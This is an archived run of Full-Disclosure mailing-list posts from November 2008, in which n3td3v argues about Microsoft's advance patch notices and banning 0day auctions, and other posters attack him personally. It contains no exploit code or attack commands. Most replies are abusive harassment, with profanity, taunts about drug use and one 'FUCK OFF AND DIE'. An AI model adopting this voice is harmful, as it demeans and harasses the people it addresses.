URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/649dc192/attachment.html 

From offbitz at gmail.com  Fri Nov  7 01:24:42 2008
From: offbitz at gmail.com (offbitz)
Date: Thu, 6 Nov 2008 19:24:42 -0600
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
Message-ID: <1c89a5ed0811061724p226d1f2eldac7141b51b1b4cb@mail.gmail.com>

Dear n3td3v,

I sincerely regret to inform you that if all you have done for the past 10
years is "monitor the scene" (i.e. trolling/spamming mailing lists and
chatrooms with elementary ramblings) then you have no leg to stand on when
somebody questions your experience.  In fact, it is quite pitiful.  Get a
job or something.

Sincerely,
offbitz
On Thu, Nov 6, 2008 at 7:06 PM, n3td3v <xploitable at gmail.com> wrote:

> i've been monitoring the scene since 1999 so what do you mean no
> experience? i make that about 10 years experience if my math is
> correct.
>
> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> > Do you even understand why people dont like you? It is because you have
> all
> > these crackpot ideas but no experience to back it up. All your ideas only
> > make sense from a theoretical standpoint, but in practicality most will
> > fail.
> >
> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
> >>
> >> blackhats like you will always hate on me, so i just ignore the
> >> negative responses i get.
> >
>
>  _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081106/20c0f0f5/attachment.html 

From xploitable at gmail.com  Fri Nov  7 01:34:58 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 01:34:58 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
Message-ID: <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>

so you don't think its logical that these 5 day heads up could be
helping the bad guys out? right. i think the world's biggest hackers
could do a lot of research in 5 days. but then again n3td3v isn't
logical so i must be wrong. damn those drugs eh? i just asked what the
realistic possibility was for a 5 day turn around from the day of the
heads up until a patch is released. i just thought it was bad that we
were giving the bad guys a 5 day head start, but never mind n3td3v
isn't logical so i must be wrong. scraping the 5 day head start isn't
a good idea because n3td3v isn't logical? right, i threw away 10 years
of my life to not be logical...

On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad <waveroad at gmail.com> wrote:
>
> You can be ""monitoring"" the scene since 20 years if you want to, it's not
> for that your point will be valuable.
> And actually it is not, also this is about logic.
>
> See you're wrong again.
>
> Get the fuck out of here.
>
>
>
>
>
>
>
>
> 2008/11/6, n3td3v <xploitable at gmail.com>:
>>
>> i've been monitoring the scene since 1999 so what do you mean no
>> experience? i make that about 10 years experience if my math is
>> correct.
>>
>>
>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>> > Do you even understand why people dont like you? It is because you have
>> > all
>> > these crackpot ideas but no experience to back it up. All your ideas
>> > only
>> > make sense from a theoretical standpoint, but in practicality most will
>> > fail.
>> >
>>
>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
>> >>
>> >> blackhats like you will always hate on me, so i just ignore the
>> >> negative responses i get.
>> >
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Fri Nov  7 01:31:03 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 6 Nov 2008 20:31:03 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
Message-ID: <6158bb410811061731p562b8058uc1697eb62747e825@mail.gmail.com>

thats 9 years u fucking moron.  that could NOT have been funnier.
most of us on this list have been WORKING in this industry for longer
than that.  u just sit and rant.  take everyones advice, including
mine.

fucking leave.  we dont care about u.  microsoft is smarter than u, we
are all smarter than u.  microsoft does it for a reason, and u
obviously dont understand what that reason is.

On Thu, Nov 6, 2008 at 8:06 PM, n3td3v <xploitable at gmail.com> wrote:
> i've been monitoring the scene since 1999 so what do you mean no
> experience? i make that about 10 years experience if my math is
> correct.
>
> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>> Do you even understand why people dont like you? It is because you have all
>> these crackpot ideas but no experience to back it up. All your ideas only
>> make sense from a theoretical standpoint, but in practicality most will
>> fail.
>>
>> On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
>>>
>>> blackhats like you will always hate on me, so i just ignore the
>>> negative responses i get.
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From ureleet at gmail.com  Fri Nov  7 01:38:31 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 6 Nov 2008 20:38:31 -0500
Subject: [Full-disclosure] Fwd: 0day auctions, should they be outlawed?
In-Reply-To: <4b6ee9310811031124k48096515jb2866798517aee3a@mail.gmail.com>
References: <4b6ee9310811030515la201841rb8f8a261041ad959@mail.gmail.com>
	<4b6ee9310811031043m475574dai75367d94d9d430a9@mail.gmail.com>
	<e7d032a60811031054hc38cdbr7ef969046279b755@mail.gmail.com>
	<4b6ee9310811031124k48096515jb2866798517aee3a@mail.gmail.com>
Message-ID: <6158bb410811061738o53b93db0w3f3bbc1568486da7@mail.gmail.com>

no.  _u_ are angry.  no 1 else.  no 1 else gives a shit.

On Mon, Nov 3, 2008 at 2:24 PM, n3td3v <xploitable at gmail.com> wrote:
> who cares what it means, people are angry, there better be a
> government task / strike force being setup for when these offers come
> infront of everyone. we can't be complacent about the dangers of these
> exploits getting bought by the bad guys. moreover, they shouldn't be
> allowed to hold people to ransom when security is at stake. ultimately
> they need to be outlawed, and if they can't be, then second best is a
> 24 hour on stand by task /strike force.
>
> On Mon, Nov 3, 2008 at 6:54 PM, Sandy Vagina <bigsandyvagina at gmail.com> wrote:
>> And by "lobbying", you mean continuing to whine on the full-disclosure list?
>>
>> Sandy
>>
>> On 11/3/08, n3td3v <xploitable at gmail.com> wrote:
>>> i'll be lobbying soon to outlaw 0day auctions, this means the banning
>>> of 0day sales on the internet. i've noticed an increased level in 0day
>>> sales lately on mailing lists, and web sites... i think this should be
>>> against the law. let me know what your opinions are on this, so i can
>>> form what im going to say when i lobby people about it. cheers.
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From biz.marqee at gmail.com  Fri Nov  7 01:41:48 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 12:41:48 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
Message-ID: <a741a45f0811061741m28967323i651281ac093935c1@mail.gmail.com>

I have watched movies for 10 years, does this make me an experienced
director? No, because watching isn't doing and as such it is not experience.

Now please address the issue of your illegal drug use, which demonstrates
complete disregard for your governments laws.


On Fri, Nov 7, 2008 at 12:06 PM, n3td3v <xploitable at gmail.com> wrote:

> i've been monitoring the scene since 1999 so what do you mean no
> experience? i make that about 10 years experience if my math is
> correct.
>
> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> > Do you even understand why people dont like you? It is because you have
> all
> > these crackpot ideas but no experience to back it up. All your ideas only
> > make sense from a theoretical standpoint, but in practicality most will
> > fail.
> >
> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
> >>
> >> blackhats like you will always hate on me, so i just ignore the
> >> negative responses i get.
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/b87d4b8d/attachment.html 

From ureleet at gmail.com  Fri Nov  7 01:44:07 2008
From: ureleet at gmail.com (Ureleet)
Date: Thu, 6 Nov 2008 20:44:07 -0500
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
Message-ID: <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>

first off, u arent going to get any1 2 change anything. so, lets get
that out of the way right there.

second of all, in order for u 2 prove ur point, id like 4 u to go to
some research of how many exploits have come out during the 5 day
period between vague-ass disclosure and patch publish.  then compare
and contrast that against how many exploits have come out in the 24
hours following the patch publish after people have had a chance to do
bindiffs (u know what that means right white-hat?) against the
patches.  then, take all that data, draw some charts and graphs, write
a whitepaper, and present it somewhere.

u know what thats called?  research.  real ppl do it.

u dont.  and that is why, u suck.  ta ta.

On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com> wrote:
> so you don't think its logical that these 5 day heads up could be
> helping the bad guys out? right. i think the world's biggest hackers
> could do a lot of research in 5 days. but then again n3td3v isn't
> logical so i must be wrong. damn those drugs eh? i just asked what the
> realistic possibility was for a 5 day turn around from the day of the
> heads up until a patch is released. i just thought it was bad that we
> were giving the bad guys a 5 day head start, but never mind n3td3v
> isn't logical so i must be wrong. scraping the 5 day head start isn't
> a good idea because n3td3v isn't logical? right, i threw away 10 years
> of my life to not be logical...
>
> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad <waveroad at gmail.com> wrote:
>>
>> You can be ""monitoring"" the scene since 20 years if you want to, it's not
>> for that your point will be valuable.
>> And actually it is not, also this is about logic.
>>
>> See you're wrong again.
>>
>> Get the fuck out of here.
>>
>>
>>
>>
>>
>>
>>
>>
>> 2008/11/6, n3td3v <xploitable at gmail.com>:
>>>
>>> i've been monitoring the scene since 1999 so what do you mean no
>>> experience? i make that about 10 years experience if my math is
>>> correct.
>>>
>>>
>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>>> > Do you even understand why people dont like you? It is because you have
>>> > all
>>> > these crackpot ideas but no experience to back it up. All your ideas
>>> > only
>>> > make sense from a theoretical standpoint, but in practicality most will
>>> > fail.
>>> >
>>>
>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
>>> >>
>>> >> blackhats like you will always hate on me, so i just ignore the
>>> >> negative responses i get.
>>> >
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



From xploitable at gmail.com  Fri Nov  7 02:02:44 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 02:02:44 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
Message-ID: <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>

i'm sorry that you don't agree with my heads up theory, i stand by
what i said however. i'm sure microsoft don't read full-disclosure
anyway, so you're right i'm not going to change anything. by the way,
i've noticed you haven't stopped stalking me yet, im a bit concerned
about your health. cheers.

On Fri, Nov 7, 2008 at 1:44 AM, Ureleet <ureleet at gmail.com> wrote:
> first off, u arent going to get any1 2 change anything. so, lets get
> that out of the way right there.
>
> second of all, in order for u 2 prove ur point, id like 4 u to go to
> some research of how many exploits have come out during the 5 day
> period between vague-ass disclosure and patch publish.  then compare
> and contrast that against how many exploits have come out in the 24
> hours following the patch publish after people have had a chance to do
> bindiffs (u know what that means right white-hat?) against the
> patches.  then, take all that data, draw some charts and graphs, write
> a whitepaper, and present it somewhere.
>
> u know what thats called?  research.  real ppl do it.
>
> u dont.  and that is why, u suck.  ta ta.
>
> On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com> wrote:
>> so you don't think its logical that these 5 day heads up could be
>> helping the bad guys out? right. i think the world's biggest hackers
>> could do a lot of research in 5 days. but then again n3td3v isn't
>> logical so i must be wrong. damn those drugs eh? i just asked what the
>> realistic possibility was for a 5 day turn around from the day of the
>> heads up until a patch is released. i just thought it was bad that we
>> were giving the bad guys a 5 day head start, but never mind n3td3v
>> isn't logical so i must be wrong. scraping the 5 day head start isn't
>> a good idea because n3td3v isn't logical? right, i threw away 10 years
>> of my life to not be logical...
>>
>> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad <waveroad at gmail.com> wrote:
>>>
>>> You can be ""monitoring"" the scene since 20 years if you want to, it's not
>>> for that your point will be valuable.
>>> And actually it is not, also this is about logic.
>>>
>>> See you're wrong again.
>>>
>>> Get the fuck out of here.
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>> 2008/11/6, n3td3v <xploitable at gmail.com>:
>>>>
>>>> i've been monitoring the scene since 1999 so what do you mean no
>>>> experience? i make that about 10 years experience if my math is
>>>> correct.
>>>>
>>>>
>>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
>>>> > Do you even understand why people dont like you? It is because you have
>>>> > all
>>>> > these crackpot ideas but no experience to back it up. All your ideas
>>>> > only
>>>> > make sense from a theoretical standpoint, but in practicality most will
>>>> > fail.
>>>> >
>>>>
>>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com> wrote:
>>>> >>
>>>> >> blackhats like you will always hate on me, so i just ignore the
>>>> >> negative responses i get.
>>>> >
>>>>
>>>>
>>>> _______________________________________________
>>>> Full-Disclosure - We believe in it.
>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>



From biz.marqee at gmail.com  Fri Nov  7 04:34:10 2008
From: biz.marqee at gmail.com (Biz Marqee)
Date: Fri, 7 Nov 2008 15:34:10 +1100
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<a741a45f0811061610x560ccc9ft3e061e40f8942beb@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
	<4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
Message-ID: <a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>

Acting like the child that he is, n3td3v continues to ignore questions posed
to him. How can he be such an avid debater over the legality of things like
metasploit, 0day auctions and similarly themed bullshit threads when he
completely disregards drug laws? How do you intend to lobby people to listen
to you when you are not a law abiding citizen yourself? You have no
credibility in the eyes of the law, so don't psuedo threaten people trying
to appear like you have some government backing. You have proven beyond
doubt that you dont, because the government doesnt listen to drug taking
internet heroes, such as yourself.

So enough with the bullshit.. FUCK OFF AND DIE.


On Fri, Nov 7, 2008 at 1:02 PM, n3td3v <xploitable at gmail.com> wrote:

> i'm sorry that you don't agree with my heads up theory, i stand by
> what i said however. i'm sure microsoft don't read full-disclosure
> anyway, so you're right i'm not going to change anything. by the way,
> i've noticed you haven't stopped stalking me yet, im a bit concerned
> about your health. cheers.
>
> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet <ureleet at gmail.com> wrote:
> > first off, u arent going to get any1 2 change anything. so, lets get
> > that out of the way right there.
> >
> > second of all, in order for u 2 prove ur point, id like 4 u to go to
> > some research of how many exploits have come out during the 5 day
> > period between vague-ass disclosure and patch publish.  then compare
> > and contrast that against how many exploits have come out in the 24
> > hours following the patch publish after people have had a chance to do
> > bindiffs (u know what that means right white-hat?) against the
> > patches.  then, take all that data, draw some charts and graphs, write
> > a whitepaper, and present it somewhere.
> >
> > u know what thats called?  research.  real ppl do it.
> >
> > u dont.  and that is why, u suck.  ta ta.
> >
> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com> wrote:
> >> so you don't think its logical that these 5 day heads up could be
> >> helping the bad guys out? right. i think the world's biggest hackers
> >> could do a lot of research in 5 days. but then again n3td3v isn't
> >> logical so i must be wrong. damn those drugs eh? i just asked what the
> >> realistic possibility was for a 5 day turn around from the day of the
> >> heads up until a patch is released. i just thought it was bad that we
> >> were giving the bad guys a 5 day head start, but never mind n3td3v
> >> isn't logical so i must be wrong. scraping the 5 day head start isn't
> >> a good idea because n3td3v isn't logical? right, i threw away 10 years
> >> of my life to not be logical...
> >>
> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad <waveroad at gmail.com>
> wrote:
> >>>
> >>> You can be ""monitoring"" the scene since 20 years if you want to, it's
> not
> >>> for that your point will be valuable.
> >>> And actually it is not, also this is about logic.
> >>>
> >>> See you're wrong again.
> >>>
> >>> Get the fuck out of here.
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>> 2008/11/6, n3td3v <xploitable at gmail.com>:
> >>>>
> >>>> i've been monitoring the scene since 1999 so what do you mean no
> >>>> experience? i make that about 10 years experience if my math is
> >>>> correct.
> >>>>
> >>>>
> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
> wrote:
> >>>> > Do you even understand why people dont like you? It is because you
> have
> >>>> > all
> >>>> > these crackpot ideas but no experience to back it up. All your ideas
> >>>> > only
> >>>> > make sense from a theoretical standpoint, but in practicality most
> will
> >>>> > fail.
> >>>> >
> >>>>
> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
> wrote:
> >>>> >>
> >>>> >> blackhats like you will always hate on me, so i just ignore the
> >>>> >> negative responses i get.
> >>>> >
> >>>>
> >>>>
> >>>> _______________________________________________
> >>>> Full-Disclosure - We believe in it.
> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>>> Hosted and sponsored by Secunia - http://secunia.com/
> >>>
> >>>
> >>> _______________________________________________
> >>> Full-Disclosure - We believe in it.
> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>> Hosted and sponsored by Secunia - http://secunia.com/
> >>>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
> >>
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081107/b04bf747/attachment.html 

From xploitable at gmail.com  Fri Nov  7 04:46:36 2008
From: xploitable at gmail.com (n3td3v)
Date: Fri, 7 Nov 2008 04:46:36 +0000
Subject: [Full-disclosure] Two bulletins from Microsoft on Patch Tuesday
In-Reply-To: <a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>
References: <4b6ee9310811061548v3835a5d0k20e8e7fd09118ba@mail.gmail.com>
	<4b6ee9310811061631ie7ce20dqccc6d3689811243c@mail.gmail.com>
	<a741a45f0811061648q276a05cag1fc0d591ae1ca15e@mail.gmail.com>
	<4b6ee9310811061706i11f821fdkc91c0b40b0b18400@mail.gmail.com>
	<296a304a0811061719r316bf9afufce1861c9056109b@mail.gmail.com>
	<296a304a0811061720n168da0f9j93e60724b0fdd4c1@mail.gmail.com>
	<4b6ee9310811061734o30d30ab9u99466c42267723ab@mail.gmail.com>
	<6158bb410811061744qe0d743cs5baeea649471bf40@mail.gmail.com>
	<4b6ee9310811061802r1f9ec795v64c7d72580c09eac@mail.gmail.com>
	<a741a45f0811062034u71746e8i354c0dfc673133d3@mail.gmail.com>
Message-ID: <4b6ee9310811062046l5cbe5789ja60fb1efa5df0143@mail.gmail.com>

you seem like an hd moore/metasploit fan boy pissed off that i don't
respect him or like his metasploit software. n3td3v doesn't respect
people like the sheep do, i think for myself, have opinions about
other white hats that may not be in support of them. get used to it
bozo.

On Fri, Nov 7, 2008 at 4:34 AM, Biz Marqee <biz.marqee at gmail.com> wrote:
> Acting like the child that he is, n3td3v continues to ignore questions posed
> to him. How can he be such an avid debater over the legality of things like
> metasploit, 0day auctions and similarly themed bullshit threads when he
> completely disregards drug laws? How do you intend to lobby people to listen
> to you when you are not a law abiding citizen yourself? You have no
> credibility in the eyes of the law, so don't psuedo threaten people trying
> to appear like you have some government backing. You have proven beyond
> doubt that you dont, because the government doesnt listen to drug taking
> internet heroes, such as yourself.
>
> So enough with the bullshit.. FUCK OFF AND DIE.
>
>
> On Fri, Nov 7, 2008 at 1:02 PM, n3td3v <xploitable at gmail.com> wrote:
>>
>> i'm sorry that you don't agree with my heads up theory, i stand by
>> what i said however. i'm sure microsoft don't read full-disclosure
>> anyway, so you're right i'm not going to change anything. by the way,
>> i've noticed you haven't stopped stalking me yet, im a bit concerned
>> about your health. cheers.
>>
>> On Fri, Nov 7, 2008 at 1:44 AM, Ureleet <ureleet at gmail.com> wrote:
>> > first off, u arent going to get any1 2 change anything. so, lets get
>> > that out of the way right there.
>> >
>> > second of all, in order for u 2 prove ur point, id like 4 u to go to
>> > some research of how many exploits have come out during the 5 day
>> > period between vague-ass disclosure and patch publish.  then compare
>> > and contrast that against how many exploits have come out in the 24
>> > hours following the patch publish after people have had a chance to do
>> > bindiffs (u know what that means right white-hat?) against the
>> > patches.  then, take all that data, draw some charts and graphs, write
>> > a whitepaper, and present it somewhere.
>> >
>> > u know what thats called?  research.  real ppl do it.
>> >
>> > u dont.  and that is why, u suck.  ta ta.
>> >
>> > On Thu, Nov 6, 2008 at 8:34 PM, n3td3v <xploitable at gmail.com> wrote:
>> >> so you don't think its logical that these 5 day heads up could be
>> >> helping the bad guys out? right. i think the world's biggest hackers
>> >> could do a lot of research in 5 days. but then again n3td3v isn't
>> >> logical so i must be wrong. damn those drugs eh? i just asked what the
>> >> realistic possibility was for a 5 day turn around from the day of the
>> >> heads up until a patch is released. i just thought it was bad that we
>> >> were giving the bad guys a 5 day head start, but never mind n3td3v
>> >> isn't logical so i must be wrong. scraping the 5 day head start isn't
>> >> a good idea because n3td3v isn't logical? right, i threw away 10 years
>> >> of my life to not be logical...
>> >>
>> >> On Fri, Nov 7, 2008 at 1:20 AM, waveroad waveroad <waveroad at gmail.com>
>> >> wrote:
>> >>>
>> >>> You can be ""monitoring"" the scene since 20 years if you want to,
>> >>> it's not
>> >>> for that your point will be valuable.
>> >>> And actually it is not, also this is about logic.
>> >>>
>> >>> See you're wrong again.
>> >>>
>> >>> Get the fuck out of here.
>> >>>
>> >>>
>> >>>
>> >>>
>> >>>
>> >>>
>> >>>
>> >>>
>> >>> 2008/11/6, n3td3v <xploitable at gmail.com>:
>> >>>>
>> >>>> i've been monitoring the scene since 1999 so what do you mean no
>> >>>> experience? i make that about 10 years experience if my math is
>> >>>> correct.
>> >>>>
>> >>>>
>> >>>> On Fri, Nov 7, 2008 at 12:48 AM, Biz Marqee <biz.marqee at gmail.com>
>> >>>> wrote:
>> >>>> > Do you even understand why people dont like you? It is because you
>> >>>> > have
>> >>>> > all
>> >>>> > these crackpot ideas but no experience to back it up. All your
>> >>>> > ideas
>> >>>> > only
>> >>>> > make sense from a theoretical standpoint, but in practicality most
>> >>>> > will
>> >>>> > fail.
>> >>>> >
>> >>>>
>> >>>> > On Fri, Nov 7, 2008 at 11:31 AM, n3td3v <xploitable at gmail.com>
>> >>>> > wrote:
>> >>>> >>
>> >>>> >> blackhats like you will always hate on me, so i just ignore the
>> >>>> >> negative responses i get.
>> >>>> >
>> >>>>
>> >>>>
>> >>>> _______________________________________________
>> >>>> Full-Disclosure - We believe in it.
>> >>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>>
>> >>>
>> >>> _______________________________________________
>> >>> Full-Disclosure - We believe in it.
>> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >>> Hosted and sponsored by Secunia - http://secunia.com/
>> >>>
>> >>
>> >> _______________________________________________
>> >> Full-Disclosure - We believe in it.
>> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> >> Hosted and sponsored by Secunia - http://secunia.com/
>> >>
>> >
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>



From biz.marqee at gmail.com  Fri Nov  7 05:09:55 2008
